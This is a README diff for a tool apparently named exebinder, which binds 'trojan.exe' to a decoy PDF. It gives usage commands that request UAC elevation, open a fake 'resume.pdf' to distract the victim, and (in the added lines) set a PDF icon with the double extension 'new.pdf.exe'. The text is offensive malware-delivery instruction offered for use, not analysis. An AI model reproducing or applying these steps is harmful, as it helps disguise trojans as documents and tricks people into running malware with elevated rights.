jlvsjp/exebinder/README.md

 `python exebinder.py --x86 xxx.exe trojan.exe --out new.exe`

-Bind trojan.exe with xxx.pdf and UAC permission.
+Bind trojan.exe with xxx.pdf and UAC permission, and set the new icon as `pdfico.jpg`.
 When new.exe running, the default pdf reader openning for reading the xxx.pdf, which name is be changed resume.pdf at runtime.

-`python exebinder --prog resume.pdf --uac xxx.pdf trojan.exe --out new.exe`
+`python exebinder --ico .\pdfico.jpg --prog resume.pdf --uac xxx.pdf trojan.exe --out new.pdf.exe`

 ## TODO